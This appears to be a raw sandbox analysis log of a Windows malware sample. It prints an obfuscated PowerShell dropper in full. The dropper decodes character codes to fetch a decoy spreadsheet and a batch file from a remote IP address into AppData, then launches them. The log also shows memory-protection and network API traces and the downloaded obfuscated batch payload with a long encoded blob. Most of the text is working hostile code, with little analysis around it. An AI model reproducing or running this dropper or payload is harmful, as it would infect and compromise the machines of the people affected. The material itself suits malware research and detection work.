parameters: -ExecutionPolicy UnRestricted function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{Start-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGUpAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,47407,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky.DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$qTGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};function LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $aldNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47359,47359,47355,47429,47417,47424,47429));eakRTR $aldNWBtEYsFWYQcs $vAaZjEjBBMtrUakWGijG;Invoke-Item $aldNWBtEYsFWYQcs;};$pXwqbI = $QFvHDxxjhpnQC + 'xD.bat'; if (Test-Path -Path $pXwqbI){atSKPKjLPuNX $pXwqbI;}Else{ $kuPmPEtni = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47429,47377,47355,47407,47406,47425));eakRTR $pXwqbI $kuPmPEtni;atSKPKjLPuNX $pXwqbI;};;;;}LztbGmYEiJQs;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK
Data received Content-Length: 12275 Content-Type: application/octet-stream Connection:close PK!bîh^[Content_Types].xml ¢( ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f›˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØPk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þÿÿPK!µU0#ôL _rels/.rels ¢( ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu*&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›ז¦é ?ˆ9LìҙÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðɂ‹¨ÞÿÿPK!â ç›úÒxl/workbook.xml¬UÛn£0}_iÿùb® ¨¤ j+uWU¯/‘V8Á `Ö6Mªªÿ¾czËK·Ýˆø6æøÌÌñp|²­+㞠Éx#û#ƒ69/X³ŠÑÍõ©9F†T¤)HÅ£*ÑÉäû·ã ëçk£R©6²,™—´&òˆ·´˒‹š(˜Š•%[AI!KJU]YƁUÖ B$>‚Á—K–Ó”ç]Mµ´" è˒µr@«óÀÕD¬»ÖÌyÝĂUL=ô È¨óèlÕpA¸½µ}c+à àochœá$0U³\pɗê ­éÿmlÙö›lcð1$Ïôžé>³Á'YÏXÁ ˜¿Œfƒ´z­
Data received L —_rels/.relsPK-!â ç›úÒ¼xl/workbook.xmlPK-!>”—óºã xl/_rels/workbook.xml.relsPK-! œÊbj7 xl/worksheets/sheet1.xmlPK-!Ê»FØXÇ ®xl/theme/theme1.xmlPK-!Z8Í)ˆ. 7xl/styles.xmlPK-!ÞD‹Éö¤'ê xl/sharedStrings.xmlPK-!¡sgBk(docProps/core.xmlPK-!IŽv~œ‹*docProps/app.xmlPK €]-
Data received Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::BeF5ow87uxWaOVsDX34hfHMzjY9LyYGJF8taUicqnOUHe1k+/C8bjfy7DRK1pgkPdtgP565bb9l1s/5bJA7EJV5U6XEOWyzY6nThjd5rAl67iErFaOrBOKOOvdUPLJj8yPws2zLhtzEujD588yBkMTMx9HC7KYAklXvPVSNdG4Ol54BuJusY/AB0kfUsR+J3koGkeRUT1m/s1AGQOaLusuZeFaFfqfOgHpgq7TWGba/B0JufgZ8a03iTDlDWnrdqh2GKb57hz7eEfEly+VXCXMdddlc9J45dLdABoTiyQ7tfKj+LXWZC52OxM+5SHVic+xXDN5nAoZvbK/WoU7y7u8SoviIS/X96YgW7R51EmhMNDPybjPit63dj4eQKo7jvhETMkWsBhp2sx6y5PKShUekyFY3WrjwAYffrkA1ZKo4qhj9rOXtHrlTCj7j+iU4uG3zFw44eGfmGvCOqUOe+iJYfFfouIEKHMg1ixaf87l4kXIlLMjjXoNn/0XJ/Tvt/eC77/MjMi9SAUg9Uvch+74mglxEvZU9GiucPSPzDflPSEhSVYj+OjkUob54YgRgL8HhhRHRlikAAyyPxSeJ18Md/asnK53hPVc49qolIY83tG3Fa2wXtEDSIitt8RQF2lWZj9HImAs0tVqmA9z+qMnbKbXy3WpYrVALWMakVYEiW7OwjVuO0Kqb7nqAtFR1MZfgeSVRWKzD5beSDoeJNUhVzs1eGAdJljUSuQnuWucaWBd9uoJcaLnGgfV0X4N9WQPwYjGd4naPDIIBYVcBweC0CoK10uOtSFiJzSqbEISWOAualyz/A6eGRHKkxaKl5F83Kp+Qillri9trdzPAGb/1ZNd54J4hbx7QR7tsfmN90wm+BevEvIzZkbF9ipwoMjAU0/BuB4PbSNely5xw5HFyyacehUXMDrtUAbDDjiwobB6dXeIO+eq1Rm6GfDNrjPcBRjphgjtQ2Qsvs1VG/3BDMIYSV4/H74I9rnWNkqo6QwwUh8bHzllBe4jhdKjthpI/OVi56Z8shqld6zR5Wt4eOYbm5I5DgS9IpwixY1Br1hQ4gyTRaYz6HDm1eo4sltb+EE9RGy2N/FfPPL7ysZD806HIwu7+uUkUUpZ5tJwAff1jVoGtkODQVN+QILsb3juCRaDB+TFoEHsJnEU8ITH19TURHoVvTOjLLn5xOhcU2etBUHlsHZ2klEydvXgRWL8yON4Oqz1CQdT+HirAYGaXn5fnWgNU09dXarADPEUOxcDVIuGWMg2p0/wgf+ANkBwdr0gCLjdlYUDpIUagoSl1jhs7FadaSS3QCJlPh4CDOePaN2gRMGEIUg3JBLnQcwSDfof61zglFwhS9jTs0fkiYuFDFEjL0dgCWNGNQG1yKdGXEEJ61RU3kqgiliOx6WjzbDggnVhbn+R4d0uExP990QRPusO5LR6Ev8aCyBSA/MjCuNayqaI843sPM52AEfQcDpmW3mlIO1A4ntSRwqL3sV7GRvd7DocYOUqDSxan9neGhuCtgrMuOus2VoqvRU7d0xyfqo5bs4SIW7qksuPW5DgQUJXm1bRTmn/kHDzJ0/4hWYV28Skzo8qT4wQcayI7I9iGl0jjYFrGiCgPQdMZx23/0Sesm4HQSpaIGOlUKBzR0/uP3jrPu0JlxkEZDairsQxmeFmpFOMx5j/vrwNgrL74iaFGGkynwqD2M2ivdpiR7Z8BgoKz8trnfXTo3H1IUB9KfnHjxFVN2CFHq/
Data received 3RjcRN/ivItbSdlXZVBnSvGnXNPvKtP8wmagR1vTu2MIdvAEwdgwEU639ERqQZYggbofqIxRQDcIRCRPDGwMyndMfdf4XfWKskZFe0S6c6/8GtjSNJ8kZOZpB2BYKVVZGqC0fTETXzZssy1cGLwyHYwwl3MlDAhMPAJYknPFbOINVbb+wjs+HaE+mt8zNDZAOLi4rFG1nNlyV6mWjldbwHZ1qQlDOG5qsovjqrLD3QK1HvkCuBT4hjNEnbatkV/HLVGBLv4Q15TIeqSjO+sqdUQqZQy9k/Zxa/721BAThA872m6ZNxpxM4US1Rh/2t4yzqgkHtjGUJrC7baMqEMMg8/fLDg2snD3vA8zt0nGdlkxnk0wqfNsGl4HkERmglZCe2NmAppUBpr9HlCOROdR4j0GzAWeS0L0WSv3ccZYjMMcbK1iDdrmPKiF6E3lUHx2ICjy7zawFuRrV12pgO8ZKYJfHcTdGqabGIJb29fIqD6z0qFWKu+Ui2uUHjHQrZYe/J79Y5K4Rd+HsFIK6WWXDx5+/NUkY4m5V4mAvI/cHBi03QllsH/pMfX3LgUF9slxBsv1YLbztoGD7yWTKlF9rh8zfmp1tkE79emaLuxE6Ezh0JoaX7fzkSnlpe7ar8FtiF6VZ0WDGm5Ig7OaJ1wx7R1P5zkX7wD8ghPBApM5YZoQ+MP+ElvQRLeWrJCA/GMxaX4rRQqa2O5GZpoO4swhrI36zwuyEVkMrR9+tLgbYh1GelfcINeFx3fgo8nvXylTO8gT3+QY8nzY6Z6q1vhgpnSsWE7B22N7+ZJaDS5Kit9+3fMZ1uQCjhP0qmI1mNsUqwmxicm7Pux16bYNDLqlpOdK7GHy2vGj/lkI+Xcy/21D3RvQi5tFjYPbLHdJ3gvR8AEfau632I482B6f8uQ+NUowaTCj95Oj6OpPC2JE0Q3HVRnlapMYZp1d+S7r5F4Z0pVyvIzNvWgZBM57tTTIHDWTtwZkhIceZxlmJy2LNam8eZNY4OQvZMlvJUY/TRf7mIDWrDjxCui6WsJvIz1ldePgGL2JWM+R8EqkMlzGrtzIGUfpXWbLytg/PO4yGlsnH6/qNaSpF9mWOLACW898l9vxKN80CQss61WDdzsfzlvuhzYiS86cq8DEImEHBJl1oiFRiA7HXotuAiyjMhlb+XhpGK3ry3siGz7z0tCCirhhqAvEsKPP5iU5TZdc09Mkx28FaVQ4S1dbtlL2LK+6KK7eMNWKPWa3HvfhZnGuNV7r6sPXkcglGZUqMr5smv5zpEz49iRcv08wulXSxJuSVkzU+1tpw2HkwXW61NUSUsEgn/Zq0MDxNpmMY5dIkNAOtKhd0v5mcaSgWYBwCYKuvOmlGy6Q5vpMUNjd04XIN0PKloxfWFuax98oeDZBa4Hyq5lWIvjhJHZJmWg79JCLzQMY30nBOqausFWNU1SkG6BEJntgjcVz4ATFDkZBaF8jS56OYocyLbif84NukFhSKbTxaN/L91YQB9/IoUwtbkjvXCpskqjWTWyoMUeSML2o8pHYJLl8u8U2E/FbRNxGhYhSw5D8bRPT1054gMKOycaTvuP6dB6l+Lc2CZUJkHDIHWrouqInvqSpI+Aef7J5FpFsN1CWfiTDhwhuuvGlSQQactPv5zqX5qv8H5L9f5pHzNjMK8q9HPf7+1hhZDOTMoScJfAnbDIK1WO0Ne6ZwcKJAe9XjQK4ImA9uoDQJNnU17+UsCwCi4FDGaaGxVQTcY+SSpkFo3eUroRKnUAioCJm9/+jZkvZ6V4yGNIHifrP+2Te0RsRxaRwTiGPlbBKvBlPkV9AyRQcu1icWI82ho/OAescYJ0dsPGiHPtd/P/nEY/3yK8JQFfeSUh8x6LKinXjW18eJvq8f5lu6d+XBofwPrIMZdA8T1egerawP+TMqy1e2Un5tV6/MYgqKy9Gcs3Y6vgxBMRaPrGrwfPElsr9PN8L+qfrfgxr0kGl2iOfVfm3y+1RmczpgMrFF5uo52Mif4HCgBi024LztTFu7ibipJkPQuQeDRbbHVg7ySyS
Data received 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
Data received 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
Data received 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
Data received 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
Data received 